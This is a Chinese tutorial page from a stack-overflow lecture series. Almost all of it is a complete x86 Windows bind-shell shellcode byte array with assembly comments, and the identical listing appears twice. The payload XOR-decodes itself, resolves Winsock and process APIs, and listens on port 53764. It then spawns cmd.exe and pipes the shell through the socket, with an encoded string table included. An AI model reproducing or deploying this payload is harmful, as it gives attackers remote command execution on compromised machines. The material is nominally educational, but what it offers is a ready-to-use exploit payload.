堆栈溢出系列讲座
window系统下的远程堆栈溢出----shellcode编写
应用前面的设计思想,我们可以写出来shellcode如下:
unsigned char sploit[580] = {
0x90, 0x8b, 0xfc, /* mov edi,esp */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax */
0xf7, 0xd0, /* not eax */
0x50, /* push eax */
0x59, /* pop ecx */
0xf2, /* repnz */
0xaf, /* scasd */
0x59, /* pop ecx */
0xb1, 0xc6, /* mov cl, C6 */
0x8b, 0xc7, /* mov eax, edi */
/*Xorshellcode */ /* */
0x48, /* dec eax */
0x80, 0x30, 0x99, /* xor byte ptr [eax], 99 */
0xe2, 0xfa, /* loop Xorshellcode */
0x33, 0xf6, /* xor esi, esi */
0x96, /* xchg eax,esi */
0xbb,0x99, 0xe8, 0x61, 0x42, /* mov ebx, &LoadLibrary */
0xc1, 0xeb, 0x08, /* shr ebx, 08 */
0x56, /* push esi */
0xff, 0x13, /* call dword ptr [ebx] */
0x8b, 0xd0, /* mov edx, eax */
0xfc, /* cld */
0x33, 0xc9, /* xor ecx, ecx */
0xb1, 0x0b, /* mov cl, 0B */
0x49, /* dec ecx */
/* loadKernelProcess */ /* */
0x32, 0xc0, /* xor al, al */
0xac, /* lodsb */
0x84, 0xc0, /* test al, al */
0x75, 0xf9, /* jne loadKernelProcess */
0x52, /* push edx */
0x51, /* push ecx */
0x56, /* push esi */
0x52, /* push edx */
0xb3, 0xe4, /* mov bl, e4 &GetProcAddr */
0xff, 0x13, /* call dword ptr [ebx] */
0xab, /* stosd */
0x59, /* pop ecx */
0x5a, /* pop edx */
0xe2, 0xec, /* loop loadKernelProcess */
/* */
0x32, 0xc0, /* xor al, al */
0xac, /* lodsb */
0x84, 0xc0, /* test al, al */
0x75, 0xf9, /* jne 00000176 */
0xb3, 0xe8, /* mov bl, e8 */
0x56, /* push esi */
0xff, 0x13, /* call dword ptr [ebx] */
0x8b, 0xd0, /* mov edx, eax */
0xfc, /* cld */
0x33, 0xc9, /* xor ecx, ecx */
0xb1, 0x06, /* mov cl, 06 */
/* loadSocketProcess */
0x32, 0xc0, /* xor al, al */
0xac, /* lodsb */
0x84, 0xc0, /* test al, al */
0x75, 0xf9, /* jne loadSocketProcess */
0x52, /* push edx */
0x51, /* push ecx */
0x56, /* push esi */
0x52, /* push edx */
0xb3, 0xe4, /* mov bl, e4 */
0xff, 0x13, /* call dword ptr [ebx] */
0xab, /* stosd */
0x59, /* pop ecx */
0x5a, /* pop edx */
0xe2, 0xec, /* loop loadSocketProcess */
/*
这一段代码就是前期的准备工作,它负责获得所有的函数的入口地址,这些函数牵
"KERNEL32.dll"
"CreatePipe"
"GetStartupInfoA"
"CreateProcessA"
"PeekNamedPipe"
"GlobalAlloc"
"WriteFile"
"ReadFile"
"Sleep"
"ExitProcess"
"WSOCK32.dll"
"socket"
"bind"
"listen"
"accept"
"send"
"recv"
*/
0x83, 0xc6, 0x05, /* add esi, 00000005 ;跳过recv{content_c},esi指向sockstruc,此时edi=esp+4+sexploit+函数table(16*4) */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax ;protocol=0 */
0x40, /* inc eax */
0x50, /* push eax ;SOCK_STREAM=1 */
0x40, /* inc eax */
0x50, /* push eax ;AF_INET=2 */
0xff, 0x57, 0xe8, /* call [edi-18] ;call socket(2,1,0); */
0x93, /* xchg eax,ebx ;ebx now contain SOCKET . */
0x6a, 0x10, /* push 00000010 ;length of sockstruc */
0x56, /* push esi ;address of sockstruc */
0x53, /* push ebx ;SOCKET */
0xff, 0x57, 0xec, /* call [edi-14] ;bind */
0x6a, 0x02, /* push 00000002 ;2个连接 */
0x53, /* push ebx ;SOCKET */
0xff, 0x57, 0xf0, /* call [edi-10] ;call listen */
0x33, 0xc0, /* xor eax, eax */
0x57, /* push edi */
0x50, /* push eax */
0xb0, 0x0c, /* mov al, 0C */
0xab, /* stosd */
0x58, /* pop eax */
0xab, /* stosd */
0x40, /* inc eax */
0xab, /* stosd ;=true;create SECURITY_ATTRIBUTES at edi */
0x5f, /* pop edi */
0x48, /* dec eax */
0x50, /* push eax ;0 */
0x57, /* push edi ;SECURITY_ATTRIBUTES */
0x56, /* push esi ;to ret write pipe,这个esi刚才指向sockstruc,现在没有用了,正好放hand*/
0xad, /* lodsd ;esi+4,esi->eax */
0x56, /* push esi ;to ret read pipe */
0xff, 0x57, 0xc0, /* call [edi-40] ;CreatePipe */
0x48, /* dec eax */
0x50, /* push eax */
0x57, /* push edi */
0xad, /* lodsd */
0x56, /* push esi */
0xad, /* lodsd */
0x56, /* push esi */
0xff, 0x57, 0xc0, /* call [edi-40] ;CreatePipe again */
0x48, /* dec eax */
0xb0, 0x44, /* mov al, 44 */
0x89, 0x07, /* mov dword ptr [edi], eax */
0x57, /* push edi */
0xff, 0x57, 0xc4, /* call [edi-3C] ;GetStartupInfo, saved at edi */
0x33, 0xc0, /* xor eax, eax */
0x8b, 0x46, 0xf4, /* mov eax, dword ptr [esi-0C] */
0x89, 0x47, 0x3c, /* mov dword ptr [edi+3C], eax ;hStdOutput=firstWrite */
0x89, 0x47, 0x40, /* mov dword ptr [edi+40], eax ;StdError= firstWrite */
0x8b, 0x06, /* mov eax, dword ptr [esi] */
0x89, 0x47, 0x38, /* mov dword ptr [edi+38], eax ;StdInput=secondRead */
0x33, 0xc0, /* xor eax, eax */
0x66, 0xb8, 0x01, 0x01, /* mov ax, 0101 ; */
0x89, 0x47, 0x2c, /* mov dword ptr [edi+2C], eax ;dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES */
0x57, /* push edi ;StartupInfo */
0x57, /* push edi ;StartupInfo */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax ;lpCurrentDirectory = NULL */
0x50, /* push eax ;lpEnvironment = NULL; */
0x50, /* push eax ;dwCreationFlags = 0; */
0x40, /* inc eax */
0x50, /* push eax ;bInheritHandles = true; */
0x48, /* dec eax */
0x50, /* push eax ;lpThreadAttributes=0; */
0x50, /* push eax ;lpProcessAttributes=0; */
0xad, /* lodsd ; */
0x56, /* push esi ;lpCommandLine=esi="cmd.exe" */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax ;lpApplicationName=NULL; */
0xff, 0x57, 0xc8, /* call [edi-38] ;CreateProcessA,eax=1:ok,0:error. */
0xff, 0x76, 0xf0, /* push [esi-10] */
0xff, 0x57, 0xcc, /* call [edi-34] */
0xff, 0x76, 0xfc, /* push [esi-04] */
0xff, 0x57, 0xcc, /* call [edi-34] ;CloseHandle */
0x48, /* dec eax ;0 */
0x50, /* push eax ;0 */
0x50, /* push eax ;SOCKET */
0x53, /* push ebx ;accept */
0xff, 0x57, 0xf4, /* call [edi-0C] ;ebx contains the client SOCKET */
0x8b, 0xd8, /* mov ebx, eax */
0x33, 0xc0, /* xor eax, eax */
0xb4, 0x04, /* mov ah, 04 */
0x50, /* push eax ;1024 */
0xc1, 0xe8, 0x04, /* shr eax, 04 */
0x50, /* push eax ;64:GMEM_FIXED+GMEM_ZEROINIT */
0xff, 0x57, 0xd4, /* call [edi-2C] ;GlobalAlloc 1024 */
0x8b, 0xf0, /* mov esi, eax ;esi contains the buffer */
/* PeekPipe: */
0x33, 0xc0, /* xor eax, eax */
0x8b, 0xc8, /* mov ecx, eax */
0xb5, 0x04, /* mov ch, 04 */
0x50, /* push eax ;lpBytesLeftThisMessage =0 */
0x50, /* push eax ;lpTotalBytesAvail=0 */
0x57, /* push edi ;lpBytesRead */
0x51, /* push ecx ;nBufferSize=1024 */
0x56, /* push esi ;lpBuffer */
0xff, 0x77, 0xa8, /* push [edi-58] ;handle of read pipe */
0xff, 0x57, 0xd0, /* call [edi-30] ;PeekNamedPipe */
0x83, 0x3f, 0x01, /* cmp dword ptr [edi], 00000001 ;[edi] contains bytes to read */
0x7c, 0x22, /* jl GetUserInput ; */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax ;lpOverlapped = NULL */
0x57, /* push edi ;lpNumberOfBytesRead */
0xff, 0x37, /* push dword ptr [edi] ;nNumberOfBytesToRead */
0x56, /* push esi ;lpBuffer */
0xff, 0x77, 0xa8, /* push [edi-58] ;handle of file to read */
0xff, 0x57, 0xdc, /* call [edi-24] ;ReadFile */
0x0b, 0xc0, /* or eax, eax */
0x74, 0x2f, /* je GameOver */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax ;flag=0 */
0xff, 0x37, /* push dword ptr [edi] ;len */
0x56, /* push esi ;buf */
0x53, /* push ebx ;SOCKET */
0xff, 0x57, 0xf8, /* call [edi-08] ;send() */
0x6a, 0x50, /* push 00000050 */
0xff, 0x57, 0xe0, /* call [edi-20] */
0xeb, 0xc8, /* jmp PeekPipe */
/* GetUserInput: */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax */
0xb4, 0x04, /* mov ah, 04 ;1024 */
0x50, /* push eax ;buf */
0x56, /* push esi ;SOCKET=2c */
0x53, /* push ebx ;recv */
0xff, 0x57, 0xfc, /* call [edi-04] */
0x57, /* push edi ;lpOverlapped */
0x33, 0xc9, /* xor ecx, ecx */
0x51, /* push ecx ;pointer to number of bytes written */
0x50, /* push eax ;nNumberOfBytesToWrite */
0x56, /* push esi ;buf */
0xff, 0x77, 0xac, /* push [edi-54] ;writehandle */
0xff, 0x57, 0xd8, /* call [edi-28] ;WriteFile(user-->StdInput) */
0x6a, 0x50, /* push 00000050 */
0xff, 0x57, 0xe0, /* call [edi-20] */
/* GameOver: */
0xeb, 0xaa, /* jmp PeekPipe */
0x50, /* push eax */
0xff, 0x57, 0xe4, /* call [edi-1C] ;ExitProcess */
0x90, /* nop */
/*
这里的长长代码就是那段C语言的算法,我的注释很详细,就不多说了
*/
0xd2, 0xdc, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa, 0xab, 0x99,
0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde,
0xfc, 0xed, 0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xd0, 0xf7, 0xff,
0xf6, 0xd8, 0x99, 0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6,
0xfa, 0xfc, 0xea, 0xea, 0xd8, 0x99, 0xda, 0xf5, 0xf6, 0xea, 0xfc, 0xd1,
0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99, 0xc9, 0xfc, 0xfc, 0xf2, 0xd7, 0xf8,
0xf4, 0xfc, 0xfd, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xf5, 0xf6, 0xfb,
0xf8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6, 0xfa, 0x99, 0xce, 0xeb, 0xf0, 0xed,
0xfc, 0xdf, 0xf0, 0xf5, 0xfc, 0x99, 0xcb, 0xfc, 0xf8, 0xfd, 0xdf, 0xf0,
0xf5, 0xfc, 0x99, 0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x99, 0xdc, 0xe1, 0xf0,
0xed, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99, 0xce, 0xca, 0xd6,
0xda, 0xd2, 0xaa, 0xab, 0x99, 0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99,
0xfb, 0xf0, 0xf7, 0xfd, 0x99, 0xf5, 0xf0, 0xea, 0xed, 0xfc, 0xf7, 0x99,
0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99, 0xea, 0xfc, 0xf7, 0xfd, 0x99,
0xeb, 0xfc, 0xfa, 0xef, 0x99, 0x9b, 0x99,
0x4b, 0x9d, // word value for bind port, 4b9d xor 9999h=53764
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
0xfa, 0xf4, 0xfd, 0xb7, 0xfc, 0xe1, 0xfc, 0x99, 0xff, 0xff, 0xff, 0xff,
0x0d, 0x0a};
/*
这些就是那个字符串表,已经经过了编码。
*/
window系统下的远程堆栈溢出----shellcode编写
应用前面的设计思想,我们可以写出来shellcode如下:
unsigned char sploit[580] = {
0x90, 0x8b, 0xfc, /* mov edi,esp */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax */
0xf7, 0xd0, /* not eax */
0x50, /* push eax */
0x59, /* pop ecx */
0xf2, /* repnz */
0xaf, /* scasd */
0x59, /* pop ecx */
0xb1, 0xc6, /* mov cl, C6 */
0x8b, 0xc7, /* mov eax, edi */
/*Xorshellcode */ /* */
0x48, /* dec eax */
0x80, 0x30, 0x99, /* xor byte ptr [eax], 99 */
0xe2, 0xfa, /* loop Xorshellcode */
0x33, 0xf6, /* xor esi, esi */
0x96, /* xchg eax,esi */
0xbb,0x99, 0xe8, 0x61, 0x42, /* mov ebx, &LoadLibrary */
0xc1, 0xeb, 0x08, /* shr ebx, 08 */
0x56, /* push esi */
0xff, 0x13, /* call dword ptr [ebx] */
0x8b, 0xd0, /* mov edx, eax */
0xfc, /* cld */
0x33, 0xc9, /* xor ecx, ecx */
0xb1, 0x0b, /* mov cl, 0B */
0x49, /* dec ecx */
/* loadKernelProcess */ /* */
0x32, 0xc0, /* xor al, al */
0xac, /* lodsb */
0x84, 0xc0, /* test al, al */
0x75, 0xf9, /* jne loadKernelProcess */
0x52, /* push edx */
0x51, /* push ecx */
0x56, /* push esi */
0x52, /* push edx */
0xb3, 0xe4, /* mov bl, e4 &GetProcAddr */
0xff, 0x13, /* call dword ptr [ebx] */
0xab, /* stosd */
0x59, /* pop ecx */
0x5a, /* pop edx */
0xe2, 0xec, /* loop loadKernelProcess */
/* */
0x32, 0xc0, /* xor al, al */
0xac, /* lodsb */
0x84, 0xc0, /* test al, al */
0x75, 0xf9, /* jne 00000176 */
0xb3, 0xe8, /* mov bl, e8 */
0x56, /* push esi */
0xff, 0x13, /* call dword ptr [ebx] */
0x8b, 0xd0, /* mov edx, eax */
0xfc, /* cld */
0x33, 0xc9, /* xor ecx, ecx */
0xb1, 0x06, /* mov cl, 06 */
/* loadSocketProcess */
0x32, 0xc0, /* xor al, al */
0xac, /* lodsb */
0x84, 0xc0, /* test al, al */
0x75, 0xf9, /* jne loadSocketProcess */
0x52, /* push edx */
0x51, /* push ecx */
0x56, /* push esi */
0x52, /* push edx */
0xb3, 0xe4, /* mov bl, e4 */
0xff, 0x13, /* call dword ptr [ebx] */
0xab, /* stosd */
0x59, /* pop ecx */
0x5a, /* pop edx */
0xe2, 0xec, /* loop loadSocketProcess */
/*
这一段代码就是前期的准备工作,它负责获得所有的函数的入口地址,这些函数牵
"KERNEL32.dll"
"CreatePipe"
"GetStartupInfoA"
"CreateProcessA"
"PeekNamedPipe"
"GlobalAlloc"
"WriteFile"
"ReadFile"
"Sleep"
"ExitProcess"
"WSOCK32.dll"
"socket"
"bind"
"listen"
"accept"
"send"
"recv"
*/
0x83, 0xc6, 0x05, /* add esi, 00000005 ;跳过recv{content_c},esi指向sockstruc,此时edi=esp+4+sexploit+函数table(16*4) */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax ;protocol=0 */
0x40, /* inc eax */
0x50, /* push eax ;SOCK_STREAM=1 */
0x40, /* inc eax */
0x50, /* push eax ;AF_INET=2 */
0xff, 0x57, 0xe8, /* call [edi-18] ;call socket(2,1,0); */
0x93, /* xchg eax,ebx ;ebx now contain SOCKET . */
0x6a, 0x10, /* push 00000010 ;length of sockstruc */
0x56, /* push esi ;address of sockstruc */
0x53, /* push ebx ;SOCKET */
0xff, 0x57, 0xec, /* call [edi-14] ;bind */
0x6a, 0x02, /* push 00000002 ;2个连接 */
0x53, /* push ebx ;SOCKET */
0xff, 0x57, 0xf0, /* call [edi-10] ;call listen */
0x33, 0xc0, /* xor eax, eax */
0x57, /* push edi */
0x50, /* push eax */
0xb0, 0x0c, /* mov al, 0C */
0xab, /* stosd */
0x58, /* pop eax */
0xab, /* stosd */
0x40, /* inc eax */
0xab, /* stosd ;=true;create SECURITY_ATTRIBUTES at edi */
0x5f, /* pop edi */
0x48, /* dec eax */
0x50, /* push eax ;0 */
0x57, /* push edi ;SECURITY_ATTRIBUTES */
0x56, /* push esi ;to ret write pipe,这个esi刚才指向sockstruc,现在没有用了,正好放hand*/
0xad, /* lodsd ;esi+4,esi->eax */
0x56, /* push esi ;to ret read pipe */
0xff, 0x57, 0xc0, /* call [edi-40] ;CreatePipe */
0x48, /* dec eax */
0x50, /* push eax */
0x57, /* push edi */
0xad, /* lodsd */
0x56, /* push esi */
0xad, /* lodsd */
0x56, /* push esi */
0xff, 0x57, 0xc0, /* call [edi-40] ;CreatePipe again */
0x48, /* dec eax */
0xb0, 0x44, /* mov al, 44 */
0x89, 0x07, /* mov dword ptr [edi], eax */
0x57, /* push edi */
0xff, 0x57, 0xc4, /* call [edi-3C] ;GetStartupInfo, saved at edi */
0x33, 0xc0, /* xor eax, eax */
0x8b, 0x46, 0xf4, /* mov eax, dword ptr [esi-0C] */
0x89, 0x47, 0x3c, /* mov dword ptr [edi+3C], eax ;hStdOutput=firstWrite */
0x89, 0x47, 0x40, /* mov dword ptr [edi+40], eax ;StdError= firstWrite */
0x8b, 0x06, /* mov eax, dword ptr [esi] */
0x89, 0x47, 0x38, /* mov dword ptr [edi+38], eax ;StdInput=secondRead */
0x33, 0xc0, /* xor eax, eax */
0x66, 0xb8, 0x01, 0x01, /* mov ax, 0101 ; */
0x89, 0x47, 0x2c, /* mov dword ptr [edi+2C], eax ;dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES */
0x57, /* push edi ;StartupInfo */
0x57, /* push edi ;StartupInfo */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax ;lpCurrentDirectory = NULL */
0x50, /* push eax ;lpEnvironment = NULL; */
0x50, /* push eax ;dwCreationFlags = 0; */
0x40, /* inc eax */
0x50, /* push eax ;bInheritHandles = true; */
0x48, /* dec eax */
0x50, /* push eax ;lpThreadAttributes=0; */
0x50, /* push eax ;lpProcessAttributes=0; */
0xad, /* lodsd ; */
0x56, /* push esi ;lpCommandLine=esi="cmd.exe" */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax ;lpApplicationName=NULL; */
0xff, 0x57, 0xc8, /* call [edi-38] ;CreateProcessA,eax=1:ok,0:error. */
0xff, 0x76, 0xf0, /* push [esi-10] */
0xff, 0x57, 0xcc, /* call [edi-34] */
0xff, 0x76, 0xfc, /* push [esi-04] */
0xff, 0x57, 0xcc, /* call [edi-34] ;CloseHandle */
0x48, /* dec eax ;0 */
0x50, /* push eax ;0 */
0x50, /* push eax ;SOCKET */
0x53, /* push ebx ;accept */
0xff, 0x57, 0xf4, /* call [edi-0C] ;ebx contains the client SOCKET */
0x8b, 0xd8, /* mov ebx, eax */
0x33, 0xc0, /* xor eax, eax */
0xb4, 0x04, /* mov ah, 04 */
0x50, /* push eax ;1024 */
0xc1, 0xe8, 0x04, /* shr eax, 04 */
0x50, /* push eax ;64:GMEM_FIXED+GMEM_ZEROINIT */
0xff, 0x57, 0xd4, /* call [edi-2C] ;GlobalAlloc 1024 */
0x8b, 0xf0, /* mov esi, eax ;esi contains the buffer */
/* PeekPipe: */
0x33, 0xc0, /* xor eax, eax */
0x8b, 0xc8, /* mov ecx, eax */
0xb5, 0x04, /* mov ch, 04 */
0x50, /* push eax ;lpBytesLeftThisMessage =0 */
0x50, /* push eax ;lpTotalBytesAvail=0 */
0x57, /* push edi ;lpBytesRead */
0x51, /* push ecx ;nBufferSize=1024 */
0x56, /* push esi ;lpBuffer */
0xff, 0x77, 0xa8, /* push [edi-58] ;handle of read pipe */
0xff, 0x57, 0xd0, /* call [edi-30] ;PeekNamedPipe */
0x83, 0x3f, 0x01, /* cmp dword ptr [edi], 00000001 ;[edi] contains bytes to read */
0x7c, 0x22, /* jl GetUserInput ; */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax ;lpOverlapped = NULL */
0x57, /* push edi ;lpNumberOfBytesRead */
0xff, 0x37, /* push dword ptr [edi] ;nNumberOfBytesToRead */
0x56, /* push esi ;lpBuffer */
0xff, 0x77, 0xa8, /* push [edi-58] ;handle of file to read */
0xff, 0x57, 0xdc, /* call [edi-24] ;ReadFile */
0x0b, 0xc0, /* or eax, eax */
0x74, 0x2f, /* je GameOver */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax ;flag=0 */
0xff, 0x37, /* push dword ptr [edi] ;len */
0x56, /* push esi ;buf */
0x53, /* push ebx ;SOCKET */
0xff, 0x57, 0xf8, /* call [edi-08] ;send() */
0x6a, 0x50, /* push 00000050 */
0xff, 0x57, 0xe0, /* call [edi-20] */
0xeb, 0xc8, /* jmp PeekPipe */
/* GetUserInput: */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax */
0xb4, 0x04, /* mov ah, 04 ;1024 */
0x50, /* push eax ;buf */
0x56, /* push esi ;SOCKET=2c */
0x53, /* push ebx ;recv */
0xff, 0x57, 0xfc, /* call [edi-04] */
0x57, /* push edi ;lpOverlapped */
0x33, 0xc9, /* xor ecx, ecx */
0x51, /* push ecx ;pointer to number of bytes written */
0x50, /* push eax ;nNumberOfBytesToWrite */
0x56, /* push esi ;buf */
0xff, 0x77, 0xac, /* push [edi-54] ;writehandle */
0xff, 0x57, 0xd8, /* call [edi-28] ;WriteFile(user-->StdInput) */
0x6a, 0x50, /* push 00000050 */
0xff, 0x57, 0xe0, /* call [edi-20] */
/* GameOver: */
0xeb, 0xaa, /* jmp PeekPipe */
0x50, /* push eax */
0xff, 0x57, 0xe4, /* call [edi-1C] ;ExitProcess */
0x90, /* nop */
/*
这里的长长代码就是那段C语言的算法,我的注释很详细,就不多说了
*/
0xd2, 0xdc, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa, 0xab, 0x99,
0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde,
0xfc, 0xed, 0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xd0, 0xf7, 0xff,
0xf6, 0xd8, 0x99, 0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6,
0xfa, 0xfc, 0xea, 0xea, 0xd8, 0x99, 0xda, 0xf5, 0xf6, 0xea, 0xfc, 0xd1,
0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99, 0xc9, 0xfc, 0xfc, 0xf2, 0xd7, 0xf8,
0xf4, 0xfc, 0xfd, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xf5, 0xf6, 0xfb,
0xf8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6, 0xfa, 0x99, 0xce, 0xeb, 0xf0, 0xed,
0xfc, 0xdf, 0xf0, 0xf5, 0xfc, 0x99, 0xcb, 0xfc, 0xf8, 0xfd, 0xdf, 0xf0,
0xf5, 0xfc, 0x99, 0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x99, 0xdc, 0xe1, 0xf0,
0xed, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99, 0xce, 0xca, 0xd6,
0xda, 0xd2, 0xaa, 0xab, 0x99, 0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99,
0xfb, 0xf0, 0xf7, 0xfd, 0x99, 0xf5, 0xf0, 0xea, 0xed, 0xfc, 0xf7, 0x99,
0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99, 0xea, 0xfc, 0xf7, 0xfd, 0x99,
0xeb, 0xfc, 0xfa, 0xef, 0x99, 0x9b, 0x99,
0x4b, 0x9d, // word value for bind port, 4b9d xor 9999h=53764
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
0xfa, 0xf4, 0xfd, 0xb7, 0xfc, 0xe1, 0xfc, 0x99, 0xff, 0xff, 0xff, 0xff,
0x0d, 0x0a};
/*
这些就是那个字符串表,已经经过了编码。
*/
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
